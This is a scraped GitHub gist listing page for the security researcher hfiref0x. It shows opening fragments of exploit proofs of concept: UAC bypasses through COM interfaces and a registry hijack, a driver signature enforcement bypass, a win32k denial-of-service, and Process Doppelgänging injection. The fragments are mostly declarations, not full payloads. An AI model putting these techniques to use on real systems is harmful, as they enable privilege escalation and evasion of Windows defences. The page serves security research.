Skip to content

Instantly share code, notes, and snippets.

View hfiref0x's full-sized avatar

hfiref0x

3.6k followers · 18 following
View GitHub Profile
@hfiref0x
hfiref0x / gist:c5d427a6e3b67ed70ede9d34def329a2
Created April 18, 2017 04:58
akagi (uacme)
akatsuki (uacme)
aoba (dsefix)
fubuki (uacme)
furutaka (tdl)
harasume (zeroaccess)
hibiki (uacme)
ikazuchi (uacme)
inazuma (uacme)
isonami (sxsexp)
@hfiref0x
hfiref0x / gist:9c3120f630241304699ecd7d93446d5f
Created May 27, 2017 04:39
BitLocker detect
#define BITLOCKER_SIGNATURE "-FVE-FS-"
#define BITLOCKER_SIGNATURE_SIZE sizeof(BITLOCKER_SIGNATURE)
#pragma pack(push,1)
typedef struct _FVEFS_BOOT_RECORD {
BYTE JumpCode[3]; //+0x0
BYTE Signature[8]; //+0x3
WORD SectorSize; //+0xB
BYTE SectorsPerCluster; //+0xD
WORD ReservedClusters; //+0xE
@hfiref0x
hfiref0x / gist:59c689a14f1fc2302d858ae0aa3f6b86
Created May 27, 2017 06:30
CIA Stinger UAC bypass (likely)
DWORD Error, bytesIO;
NTSTATUS Status;
HANDLE hProcessToken = NULL, hNewToken = NULL, hTest;
BOOL bCond = FALSE;
SHELLEXECUTEINFO shinfo;
SID_IDENTIFIER_AUTHORITY MLAuthority = SECURITY_MANDATORY_LABEL_AUTHORITY;
TOKEN_MANDATORY_LABEL tml, *ptml;
PSID pIntegritySid = NULL;
STARTUPINFO si;
PROCESS_INFORMATION pi;
@hfiref0x
hfiref0x / main.c
Last active May 15, 2023 17:33
NtLoadEnclaveData Windows 10 RS3 DSE bypass
// Original source link https://twitter.com/hFireF0X/status/887930221466443776
// If you are here from any other link - do know that they just steal original info without giving any credit to source
// This bug has been fixed in 16273 public build.
#include "global.h"
HINSTANCE g_hInstance;
HANDLE g_ConOut = NULL;
BOOL g_ConsoleOutput = FALSE;
WCHAR g_BE = 0xFEFF;
@hfiref0x
hfiref0x / akagi_41.c
Created August 16, 2017 03:31
UAC bypass using CMSTPLUA COM interface
typedef interface ICMLuaUtil ICMLuaUtil;
typedef struct ICMLuaUtilVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in ICMLuaUtil * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / akagi_42b.c
Last active February 14, 2024 11:56
UAC bypass using FwCplLua COM interface and HKCU mscfile registry entry hijack
typedef interface IFwCplLua IFwCplLua;
typedef struct IFwCplLuaInterfaceVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IFwCplLua * This,
__RPC__in REFIID riid,
_COM_Outptr_ void **ppvObject);
@hfiref0x
hfiref0x / NtUserOpenDesktop.c
Created November 29, 2017 14:12
Win32k NtUserOpenDesktop Denial Of Service (9200-17046)
/*
Win32k NtUserOpenDesktop->OpenDesktop Denial Of Service feature.
Working range: x64 Windows 8 (9200) up to Windows 10 RS4 (17046).
x86 versions not tested.
Feature:
@hfiref0x
hfiref0x / inject.c
Last active May 31, 2023 16:23
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
// Credits:
// Vyacheslav Rusakov @swwwolf
// Tom Bonner @thomas_bonner
//
#include <Windows.h>
@hfiref0x
hfiref0x / temp.c
Created July 24, 2018 18:53
DCDv1 unpack
#include <Windows.h>
#include <msdelta.h>
#pragma comment(lib, "msdelta.lib")
BOOL load_file(LPCTSTR FileName, LPDWORD BytesRead, LPVOID *AllocatedBuffer)
{
HANDLE f;
LARGE_INTEGER fsz;
LPVOID buffer = NULL;
@hfiref0x
hfiref0x / akagi_49a.c
Created August 23, 2018 16:34
UAC bypass using CreateNewLink COM interface
typedef struct tagCREATELINKDATA {
ULONG dwFlags;
WCHAR szLinkName[MAX_PATH]; // + 0x20C
WCHAR szExeName[MAX_PATH]; // + 0x414
WCHAR szParams[MAX_PATH]; // + 0x61C
WCHAR szWorkingDir[MAX_PATH]; // + 0x824
WCHAR szOriginalName[MAX_PATH]; // + 0xA2C
WCHAR szExpExeName[MAX_PATH]; // + 0xC34
WCHAR szProgDesc[MAX_PATH]; // + 0xE3C
WCHAR szFolder[MAX_PATH]; // + 0x1044